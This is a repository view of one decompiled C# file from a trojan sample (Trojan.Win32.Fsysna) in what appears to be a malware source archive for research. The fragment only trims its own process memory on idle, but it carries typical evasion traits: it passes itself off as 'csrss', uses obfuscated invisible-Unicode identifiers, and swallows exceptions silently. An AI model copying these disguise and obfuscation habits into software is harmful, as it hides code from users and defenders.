MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.ujb-dca840b3862ed520a86af06748a84aa60d663bef2c7875759235eb95d0228c91/_0001/_0001.cs
2022-08-18 06:28:56 -05:00

73 lines
1.7 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: csrss, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 57F4D4CE-643E-4C92-9C47-86B837B59593
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.ujb-dca840b3862ed520a86af06748a84aa60d663bef2c7875759235eb95d0228c91.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace \u0001
{
internal sealed class \u0001
{
private static \u0001.\u0001 \u0001;
private long \u0001 = DateTime.Now.Ticks;
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u0002(
IntPtr process,
int minimumWorkingSetSize,
int maximumWorkingSetSize);
private void \u0002()
{
try
{
using (Process currentProcess = Process.GetCurrentProcess())
\u0001.\u0001.\u0002(currentProcess.Handle, -1, -1);
}
catch
{
}
}
private void \u0002(object sender, EventArgs e)
{
try
{
long ticks = DateTime.Now.Ticks;
if (ticks - this.\u0001 <= 10000000L)
return;
this.\u0001 = ticks;
this.\u0002();
}
catch
{
}
}
private \u0001()
{
// ISSUE: method pointer
Application.Idle += new EventHandler((object) this, __methodptr(\u0002));
this.\u0002();
}
public static void \u0003()
{
try
{
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
return;
\u0001.\u0001.\u0001 = new \u0001.\u0001();
}
catch
{
}
}
}
}